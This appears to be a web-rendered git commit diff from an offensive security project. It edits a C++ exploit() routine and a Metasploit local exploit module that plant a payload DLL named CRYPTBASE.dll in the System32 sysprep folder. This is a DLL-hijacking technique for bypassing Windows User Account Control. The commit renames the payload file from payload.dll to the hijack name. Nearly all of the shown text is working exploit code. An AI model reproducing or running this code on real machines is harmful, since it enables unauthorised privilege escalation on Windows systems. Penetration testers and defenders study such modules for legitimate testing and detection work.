Remove large file and rename payload.dll
parent
035e97523b
commit
ff5cf396ab
|
@ -5,7 +5,7 @@ void exploit()
|
||||||
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
|
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
|
||||||
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
||||||
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
|
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
|
||||||
const wchar_t *szSourceDll = L"payload.dll"; // Need some IPC to randomize this if possible
|
const wchar_t *szSourceDll = L"CRYPTBASE.dll"; // Need some IPC to randomize this if possible
|
||||||
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
|
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
|
||||||
const wchar_t *szElevArgs = L"";
|
const wchar_t *szElevArgs = L"";
|
||||||
wchar_t path[MAX_PATH];
|
wchar_t path[MAX_PATH];
|
||||||
|
|
Binary file not shown.
|
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
payload = generate_payload_dll
|
payload = generate_payload_dll
|
||||||
|
|
||||||
|
|
||||||
payload_filepath = "#{tmpdir}\\payload.dll"
|
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
|
||||||
|
|
||||||
|
|
||||||
print_status("Uploading the Payload DLL to the filesystem...")
|
print_status("Uploading the Payload DLL to the filesystem...")
|
||||||
|
|
Loading…
Reference in New Issue